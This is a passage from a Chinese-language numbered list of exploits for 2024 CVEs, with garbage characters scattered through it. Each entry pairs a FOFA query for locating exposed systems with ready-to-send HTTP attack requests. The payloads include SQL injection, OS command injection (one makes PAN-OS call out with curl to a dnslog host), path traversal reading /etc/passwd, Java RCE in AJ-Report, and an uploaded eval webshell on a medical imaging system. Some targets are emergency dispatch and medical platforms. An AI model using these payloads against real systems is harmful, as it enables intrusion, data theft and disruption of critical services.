" k7 B' k/ B( u3 R$ T; OFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 `0 S ?+ U. h( v% ?
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
) }; B/ r& c3 Z, G# lHost: x.x.x.x: n6 Y4 a9 u0 t, H2 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 G9 c: d! w7 U7 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 n R" Q p; v8 ~) f/ qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# V. q: ]! V! S% G& u9 O& y! }Accept-Encoding: gzip, deflate, br- e! L/ q8 x. r$ {7 d* x' |6 p
Connection: close
9 o7 f* y9 l7 B' l9 J- e9 q d8 UCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
: }1 @, U B! a( nUpgrade-Insecure-Requests: 1* t6 E3 x/ m! t
$ ?+ C5 R& R. I$ k6 }! W5 s
9 u" s& ^, W+ Q6 k
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) O. n/ z5 O9 u' `, _. FCVE-2024-2566* Z: I2 f8 f1 U# F7 P" _/ C
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' o: t1 W! C+ y+ q0 x! V4 {6 i$ c
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
/ m i' u9 y% u, P- |( u" V4 mHost: x.x.x.x$ f4 y( [! ?- }5 Y+ e" c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 [2 U7 \/ D* T9 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# q5 h( z U* m; M6 v2 l# X$ N* \1 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 B7 E/ c5 j' L6 x5 jAccept-Encoding: gzip, deflate, br
' @! x6 J8 v7 T1 p- E& JConnection: close
/ [# w, @) H+ v7 k" H+ E" \# |3 [. [/ sCookie: authcode=h8g9
7 P7 u7 a1 O2 J5 V' w. _8 x) }Upgrade-Insecure-Requests: 1
/ I# v0 s% `: T, U' K) n3 _
" Q- F$ Z% S& Y! B
. D) w* M( Q& s8 {0 X141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入+ j3 `8 t: b) S1 j! A
FOFA:body="指挥调度管理平台"
3 `- Z# X4 [& U- A' B; R) }POST /app/ext/ajax_users.php HTTP/1.1
, ]2 h* h* } Q1 T9 ?1 yHost: your-ip
0 U: A: l3 u& }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# n) _8 |2 u, O7 d. E7 i. `, }Content-Type: application/x-www-form-urlencoded7 k/ e6 p/ N: M5 Z; e
* E+ a4 U( d$ n" R \$ F/ V
& A4 Z3 O( B) l
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
. h7 P1 O6 L- B3 c5 R3 M. r- A# m7 S) t6 F+ h3 c8 d
0 ^0 X, u c; l) t( s9 T0 d
142. CMSV6车辆监控平台系统中存在弱密码
0 l, S S" b2 n* p8 V2 vCVE-2024-296665 ^0 g8 s, R( w" h! V+ J [5 b& c. ? Q
FOFA:body="/808gps/"7 s- a ~: G c
admin/admin
+ W/ f: N9 {- B; |% _. ~# p143. Netis WF2780 v2.1.40144 远程命令执行$ C7 Q U3 y( ?; @
CVE-2024-25850; |; R3 @, \# u3 R( F
FOFA:title='AP setup' && header='netis'
# y. o, z5 w- ?. R3 M+ P1 P* e, \PAYLOAD3 X0 Q! P7 }/ j
* v' r3 L# {1 Q& m, L* ]
144. D-Link nas_sharing.cgi 命令注入
0 h' Q1 x- y6 uFOFA:app="D_Link-DNS-ShareCenter"$ {) i6 p3 O; b, h
system参数用于传要执行的命令
* }. q1 ? ~: y. c: u2 vGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.11 Q' d8 p4 ^- E0 A" A. r2 U/ `
Host: x.x.x.x
) q# K' j8 l8 r' D) [1 ]User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
7 i4 K, T' R+ {Connection: close
; \& B2 u' X5 Y1 hAccept: */*
2 Z$ r5 D% p' Y& iAccept-Language: en
0 O/ }( o' [+ y- `Accept-Encoding: gzip
, ?0 B4 T+ j1 y$ S1 E/ D P& t- m8 u( b3 n5 o
4 \" m5 ]% V6 a0 f9 P6 x
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
4 \' `9 `! V+ B6 |CVE-2024-3400
' }) W* J% }) ~( X9 k7 @2 JFOFA:icon_hash="-631559155"* V5 k' j+ z- Y
GET /global-protect/login.esp HTTP/1.10 O+ A* R, m; A7 }# p! A6 b# Y0 P
Host: 192.168.30.112:1005: d# T2 N; v( ?$ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84' U# a5 C* y) A0 ]4 e
Connection: close
% @+ s- v7 ^- G0 HCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
! @- f. e7 e& e& r2 m, ^Accept-Encoding: gzip
2 X! l$ B4 M6 d0 g3 z5 X9 r
; Z# m! T" \2 L3 h
. h8 c! j( L$ J1 s( W! u- ?146. MajorDoMo thumb.php 未授权远程代码执行
; Q) z! E+ b& q4 [; C# qCNVD-2024-021759 [0 u k7 D- O! G. K) f& T) z
FOFA:app="MajordomoSL"
' e, P& Z, X6 QGET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
: k: t; ~+ V- UHost: x.x.x.x
$ m4 W( N$ L1 `4 q; ~* d: yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
& [% H% i+ f/ o" _0 ]. C, eAccept-Charset: utf-8$ A" c5 |& S" n) m" q
Accept-Encoding: gzip, deflate/ w: l8 P4 L* k- F: ^& x$ t! K. }
Connection: close
: r, @# f* w6 P5 `( Q5 D( L0 R# d+ D2 l( Q: j$ u- m
. p* h& k w4 F: h# p; D+ Y
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
* D6 Q; _: |8 `! O: O8 vCVE-2024-32399
6 ?$ a0 V: j2 X, kFOFA:body="RaidenMAILD"
* _# G) L. I7 ]GET /webeditor/../../../windows/win.ini HTTP/1.1
8 }5 F0 _( L" W* gHost: 127.0.0.1:815 ] g) ] s9 G: D
Cache-Control: max-age=03 f6 {) @$ O# Y
Connection: close+ s! M- P6 c% u
9 m w8 O/ F2 T, H* X2 P
7 E7 {# A. U, ?5 v/ J1 O A* [; ^, b148. CrushFTP 认证绕过模板注入) A" m1 D; w* F2 P3 L" p
CVE-2024-4040, o( D; v4 S' e9 o
FOFA:body="CrushFTP"# m. S/ `5 x# Z1 S' Y) g$ E
PAYLOAD3 K l! n$ ]- N
! S0 @, k; \1 U0 z& F3 `& C
149. AJ-Report开源数据大屏存在远程命令执行( }4 @2 u# X) ~4 U) U* l3 j7 E
FOFA:title="AJ-Report"! G, _7 M+ w8 w3 I/ m' t5 }( a/ U
) l! ?; ^2 K/ V- n: Y! }! _POST /dataSetParam/verification;swagger-ui/ HTTP/1.1. F) A1 [9 i k& ~: \2 h
Host: x.x.x.x( `, Y3 t( w5 A! j" q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 b6 ]) D2 z* t: |) V' I0 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 L% }1 H' M3 A" g- D ~! fAccept-Encoding: gzip, deflate, br4 i, \" w& z$ q
Accept-Language: zh-CN,zh;q=0.9# @' I8 Y1 h5 a- n
Content-Type: application/json;charset=UTF-8
, i8 v, w0 J6 `3 ?5 t @Connection: close
/ m$ P$ l- [0 i* X* M5 e/ v9 C* N2 j; y( N8 I0 \9 w
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
* s6 K& p6 I& R: {0 C* `9 e
/ `. d+ s9 m: m2 q9 s, k' W& M150. AJ-Report 1.4.0 认证绕过与远程代码执行
; N' C# h) f, n+ \9 dFOFA:title="AJ-Report"
+ N4 n5 F: L: \* l" s5 vPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
1 B u) y: _* Y9 R& G( X$ M! ZHost: x.x.x.x' J+ z. }$ q: I \$ Y- a$ J! \1 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: ?- _: y) m5 N, g' j- G, w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) W, @4 I: C4 k8 JAccept-Encoding: gzip, deflate, br8 q" q# p- m; z1 r4 ~% m6 ?: L
Accept-Language: zh-CN,zh;q=0.9
1 i( c/ Y1 \! z. t3 G) K2 R# U, MContent-Type: application/json;charset=UTF-82 G) G/ U. ]4 `5 s* ] O1 @
Connection: close- ]$ f; l) g1 d: `
Content-Length: 339
: ~- P a2 @$ {1 C4 [9 o; Q1 U% L: M/ u N# n4 P) C
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
6 x; q. q" w; _3 \$ l5 \
! E) G# d) D% D0 h/ _: U' d; [) f e. v: N) B! I H/ D
151. AJ-Report 1.4.1 pageList sql注入
+ x) a2 C4 a R% \ B F% KFOFA:title="AJ-Report"
% [! i6 T& i8 g: [GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.11 w, v# y$ b6 o1 F
Host: x.x.x.x6 p: K% t7 s8 ~5 O+ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 Q. a2 Z% s7 v& J) g9 GConnection: close
1 f0 U; \4 s# ?. P! CAccept-Encoding: gzip
# I" D- z' b n: J4 O8 k, f7 T0 K! C6 F/ o7 ?+ z/ n# O- i' }4 L6 q
8 x8 Y" N* T5 N5 ]1 Q
152. Progress Kemp LoadMaster 远程命令执行2 g" v b9 Y, |. h+ B
CVE-2024-1212, H9 Z5 T, t! o3 m- V: m
LoadMaster <= 7.2.59.2 (GA)6 J. ~, o! r% I4 o$ m& @
LoadMaster<=7.2.54.8 (LTSF)0 c8 i8 T5 g2 V% B7 ]4 v
LoadMaster <= 7.2.48.10 (LTS)1 y0 v! \+ N: {
FOFA:body="LoadMaster". V5 H0 ?! h! r
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
# Y5 f3 \9 S: x3 `# k$ _GET /access/set?param=enableapi&value=1 HTTP/1.1
; i7 m8 Y; `: vHost: x.x.x.x
! Y, \' C' U8 O- L8 g) ~4 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
0 u: C q) `4 A3 D8 n- iConnection: close' X; i, E3 M1 d1 R; G( y
Accept: */*
' y& k v5 }' _Accept-Language: en% p; N7 B; T0 ]
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) ?, p* ?% A, p1 Q
Accept-Encoding: gzip4 p- g9 t1 _ z& ^9 @9 V. b; A( O
! F9 |& P: n/ I# M2 X& G
/ h4 \ a# Z) h5 G% v153. gradio任意文件读取- l M1 g, M! g4 w7 i
CVE-2024-1561FOFA:body="__gradio_mode__"% w3 R' V3 O R
第一步,请求/config文件获取componets的id
$ G Y6 Z+ T! X& s8 whttp://x.x.x.x/config) m7 O" ~! e9 Y" u& S Q/ U) H
% G! _* H9 V8 ?; L3 v+ x) q1 |/ t0 d% H F( e
第二步,将/etc/passwd的内容写入到一个临时文件
/ I5 R& n- Z" K, I/ g8 @POST /component_server HTTP/1.1$ z8 O0 |' u4 P& |" E X* f* N
Host: x.x.x.x
1 f ~+ M; G8 a. A9 M& R9 T% \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.31 q) R8 ]0 p8 n
Connection: close$ Z3 a) |7 X& |0 t' a) k! f' k0 g
Content-Length: 115
* c2 k1 [2 Z. ~1 u; t3 aContent-Type: application/json
' l" ?2 h {5 f; n3 W' |. KAccept-Encoding: gzip
" ]4 x# z8 o- S0 h* \7 Z3 {& I2 H" c9 i9 }9 W
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
1 ]3 ~$ X& s! M4 `% Y' g' k; R% K2 o8 s% |# h9 c' F: e, H8 x" i- \
5 C- n5 {, B2 ~& I; s5 E
第三步访问
6 m4 P" ?2 @" _- V, U* B! k; Dhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd0 U5 L: K, W' o
- x+ i) ]6 w: c5 G5 q
5 L+ x& T8 u9 c& `8 E( L154. 天维尔消防救援作战调度平台 SQL注入! P0 |! ]$ x( M% x+ d
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"5 v# Z( g. C( S- } v
POST /twms-service-mfs/mfsNotice/page HTTP/1.1) ]9 ~' O- m5 P. v) [. Y2 ?
Host: x.x.x.x
0 ^9 Z. W3 P" r% o, q( ?Content-Length: 106# n) d$ r% b) t+ s" o$ |( V m6 p
Cache-Control: max-age=0
3 P8 _% O3 l. LUpgrade-Insecure-Requests: 1
& y' O% ^/ X% R) F4 POrigin: http://x.x.x.x, ^+ ~& a* L; H" {5 t
Content-Type: application/json
# _$ w: Z: b+ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
' R8 d B' o: @$ S* YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 f8 w6 U# }$ h% hReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
+ T$ J' S/ L( R2 k7 DAccept-Encoding: gzip, deflate
7 j1 ~- N# w0 A6 s0 g! s4 F5 |Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
X) S4 r1 p& K( l9 ^2 e3 I* jConnection: close/ o/ r+ m' j/ U" `) U2 X' @7 `
/ P/ X8 J, s. X$ a# w3 U& X{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
" I% h3 R, x; u" h: O: o
' ]! F% q# v5 P6 o9 {! a/ \$ L7 S% z* z7 w j* u
155. 六零导航页 file.php 任意文件上传. }/ a* w4 g( x. e) S
CVE-2024-34982
* x! H0 B2 R& c$ q+ jFOFA:title=="上网导航 - LyLme Spage"
. L$ O! O+ b$ N' K' G6 O/ L! E# LPOST /include/file.php HTTP/1.14 Q! Z e! r; `& e) q0 l4 u( ^
Host: x.x.x.x+ j: d# ]. M8 P, F& m* A: ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0. r6 j7 {( v9 z/ k/ j
Connection: close' t5 g% a7 M1 c9 K- M: |0 a# P
Content-Length: 2328 d9 Y9 o6 d. H
Accept: application/json, text/javascript, */*; q=0.01
% w5 Q, \. P' u3 p8 \% ]Accept-Encoding: gzip, deflate, br+ j! S9 ~! U# i2 W: ^0 N9 f9 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 M. s0 X9 E9 r4 ]0 b2 z7 [9 jContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
8 Q6 ]1 F6 e. [$ UX-Requested-With: XMLHttpRequest( q- Q2 Q2 c( m: `+ Z& d
7 d+ U8 l; H0 T# R5 U. t
-----------------------------qttl7vemrsold314zg0f
: k" f H2 V6 }8 _$ qContent-Disposition: form-data; name="file"; filename="test.php"
1 Q/ t" b5 g& Z2 p2 D5 X0 I4 SContent-Type: image/png
/ j( h8 f* ~4 u, c$ C8 f6 b8 Q8 Y: _& i, I
<?php phpinfo();unlink(__FILE__);?>* Y" m9 a) @0 r9 E; l T
-----------------------------qttl7vemrsold314zg0f--6 a2 M$ S. M p2 X
! l6 K# O w: j: X2 _, d: c
2 ^; D3 h5 {, E) R/ t
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php. L' o8 G H6 S7 J$ U' F
( c' E: v1 R0 s, T' v0 Q
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ c6 i' e- v: f: ~CVE-2024-3721
% N. M3 S3 u/ [FOFA:"Location: /login.rsp"
; G# u' C9 [0 t9 v2 F·TBK DVR-41049 j$ s* l3 O5 H* g+ m
·TBK DVR-4216
7 E( o$ |+ e- f* s3 y& ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"! u& t' v% h! B% o
0 B% q. S9 T0 {) {! G+ \5 v+ l# L1 ^2 ?6 f8 H* R; x
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
6 E0 a$ y* E- T, _Host: x.x.x.x
' P0 r3 H* C9 ]3 N4 }* bUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* A4 D- J5 G* x; s2 j( ^
Connection: close% Q. L+ J. d) w# E% k
Content-Length: 00 {$ ^ J1 Z/ n. w5 b% w( X
Cookie: uid=1
. `3 `1 a! B) N2 Y2 [Accept-Encoding: gzip
- o8 ~# j; l. P+ ~# o
( x4 W9 J$ d+ L+ R K) {3 _3 w- f; I* q- g1 ~
157. 美特CRM upload.jsp 任意文件上传
9 d9 g; v! a4 I1 WCNVD-2023-06971+ g R/ j. h( f8 R5 E6 r! v7 q0 F- L2 {
FOFA:body="/common/scripts/basic.js"( J1 ^1 u! r& P0 b5 {) T0 r
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1+ [8 D/ n, s! u5 M6 T' L$ z
Host: x.x.x.x
9 v# k$ p: w4 o6 R/ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.364 S/ u/ }+ _' I* Q9 E
Content-Length: 709& }7 W& n9 p' j- R4 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 q6 D1 v+ D s; m
Accept-Encoding: gzip, deflate
9 c4 c" n/ h% _3 NAccept-Language: zh-CN,zh;q=0.9
|7 ~; s5 V6 ^3 [7 m, l2 WCache-Control: max-age=07 e! h9 A7 c A& j, ~& o2 ^5 G
Connection: close
" R% q4 q! d1 f' D" t' CContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN* c) L& g5 p. s( r- r# F% `
Upgrade-Insecure-Requests: 16 i/ N& d. h6 C+ U: [9 e
8 B7 M) i: S) A# ]' [- F------WebKitFormBoundary1imovELzPsfzp5dN* f- p/ d8 B3 F E
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
2 V/ C; n) |$ d9 j; i- n2 `Content-Type: application/octet-stream* L! w! x$ T' S8 v
4 ^: r+ w+ p; p* [) Gnyhelxrutzwhrsvsrafb
9 x: e# p% D9 o) _- {6 l8 R0 Q------WebKitFormBoundary1imovELzPsfzp5dN) Y- ^1 `4 [. |% [5 [6 G) q
Content-Disposition: form-data; name="key"$ {* i% Y) G# H$ }4 R: j* D/ ^
: W1 p) i' o- q$ l6 pnull
# p+ F3 k- x+ a# y7 v# q------WebKitFormBoundary1imovELzPsfzp5dN2 W. y: _7 \: [; p
Content-Disposition: form-data; name="form"
8 K% _/ m4 ^ F9 ]1 U, d# z: U5 D/ P1 x f
null8 s( g2 d6 j6 I1 x' Z8 i8 H& O
------WebKitFormBoundary1imovELzPsfzp5dN, `# }7 x' g% C7 w3 v
Content-Disposition: form-data; name="field"
- j/ h) i/ z4 C$ W
# Y+ s8 B1 c7 Q% Y$ K' w2 P) knull7 T, v6 B1 N5 x# Q1 H
------WebKitFormBoundary1imovELzPsfzp5dN7 g' E* B/ a- k6 l7 M4 v
Content-Disposition: form-data; name="filetitile"
) f. ?" u$ i( X& O
( P3 P9 t, Z) P- e" Z! lnull
0 _1 I4 k6 v8 l0 w5 @. a' Y7 o v------WebKitFormBoundary1imovELzPsfzp5dN5 N; M, O. {' [
Content-Disposition: form-data; name="filefolder"
1 j5 r6 p3 z4 _
$ [' O! B2 }* j( bnull
) }; [" G/ W |& r. Z4 T------WebKitFormBoundary1imovELzPsfzp5dN--: K! X. A; G; H) M: N
$ C6 C1 Q+ q5 p- @2 b, N5 Y$ B7 K( q5 N- t& c( X
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
, v, _+ _% C7 h' X( n% ~4 U0 y! h Q! [# W
158. Mura-CMS-processAsyncObject存在SQL注入
- }0 T5 T7 l1 S0 WCVE-2024-32640
* [( Y% z7 a0 G$ W0 CFOFA:"Generator: Masa CMS"
6 [) S: e! U5 ]* k4 |$ x) \3 c9 DPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: J7 ]; I' }/ UHost: {{Hostname}}; D3 M3 g7 _$ a
Content-Type: application/x-www-form-urlencoded' e" a. W8 b% B1 T
, b& Z# K# t( s* K8 w# S
object=displayregion&contenthistid=x\'&previewid=1
6 X0 ~3 q* ?' V- ?* d
2 m/ n8 ?* ^) C( \9 j- D
Q. M: S/ y, u1 `$ e; s& ~159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
% T1 d6 u" B5 |/ C% eFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")# q# }/ ?7 U5 X |- O
POST /webservices/WebJobUpload.asmx HTTP/1.15 K6 o1 q8 W/ g4 a1 N r5 N
Host: x.x.x.x" M. \" L& e, h _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.364 r' O& I0 X' l5 p: g) ]
Content-Length: 10804 T3 \! E' f% }) y
Accept-Encoding: gzip, deflate' Y4 [5 P6 `8 \0 g8 b8 o- u
Connection: close4 A H1 d6 B, s. X+ K0 O& S& `
Content-Type: text/xml; charset=utf-8
- a L/ D! n: y6 \1 g) b9 PSoapaction: "http://rainier/jobUpload"
2 k4 D9 m( m! B
0 E; c! }. j/ j3 g' J, X5 T; ?<?xml version="1.0" encoding="utf-8"?>2 Q" k- \, c$ r" f" ~" Q
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 T& ]! A; w2 I. C0 o( L2 X( [& \
<soap:Body>! p" k% g$ t# X) E
<jobUpload xmlns="http://rainier">5 [6 @4 P2 s9 n$ q% B
<vcode>1</vcode>3 \9 W5 b5 E, e8 P1 e
<subFolder></subFolder> ?2 s9 E, w+ ^" ]) y
<fileName>abcrce.asmx</fileName>
; s1 E! n4 Y8 h3 ~( R<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>6 A; @$ ^; T8 f K4 I+ q! ?6 [
</jobUpload>* ^- k7 m' n- K) }
</soap:Body>
8 p* Q5 `* L$ p! E* y</soap:Envelope>7 l% U6 q' y0 ^8 m
6 X3 r3 o5 G' W, E0 k* @0 W) I3 d
6 m- g$ E- d/ B) d- o- w6 a/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
- P3 a- }" P* Z+ y2 K: h3 P
2 c* s7 ]$ @3 ^ J( t2 G) w6 E* n4 I5 R
160. Sonatype Nexus Repository 3目录遍历与文件读取; m' |+ l4 n, |6 I9 C1 O' U
CVE-2024-4956
% L5 S/ f/ w; q+ U i- g8 y4 [FOFA:title="Nexus Repository Manager"! h# n# T: p2 b3 l
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.17 P0 S# r# [- l
Host: x.x.x.x: X* Y3 E. H8 B# s/ p* x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
; ^, V4 w# q# m8 {! l9 E: i; tConnection: close6 }3 F, `, p4 S l' r
Accept: */*$ C( Z2 H( i w1 u" t0 N) F2 v
Accept-Language: en* U! E; v" A$ }
Accept-Encoding: gzip
, d. H" A, l4 W. ~, w7 P: T. H2 |' u. f# N6 z( ~1 U' F% m/ j
. [& M* X+ T# P* E* I161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ N& X. T; u+ b' C: o
FOFA:body="/KT_Css/qd_defaul.css"% T ?" Z: l/ A; b( \
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
4 e p4 U% D( Q1 APOST /Webservice.asmx HTTP/1.1, Z7 S! `, v2 N3 B
Host: x.x.x.x
5 ]; r: Z. |0 w% C. yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 T! u1 B; V! h/ g+ v
Connection: close: J+ l) {( Y/ J5 ]3 ?
Content-Length: 445
$ f/ u$ Y a8 g1 F$ F, }6 V( N. }Content-Type: text/xml! N+ ]- s5 h- E3 `7 O3 c
Accept-Encoding: gzip! ^4 N1 O; x W
/ g% B+ O4 v; B, |) y0 k- j8 v
<?xml version="1.0" encoding="utf-8"?>
/ r/ g1 q8 l* Z# c<soap:Envelope xmlns:xsi=": P9 n3 }7 j: {# M4 \9 j
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"- a3 q! F5 q4 O% r# x& X0 O
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ A" R( M6 n' a1 O: `/ w! a% T8 r6 s( z<soap:Body>
# z' R( j2 Q- P$ z$ b5 R<UploadResume xmlns="http://tempuri.org/">) U; K4 M6 ~2 Z* b
<ip>1</ip>
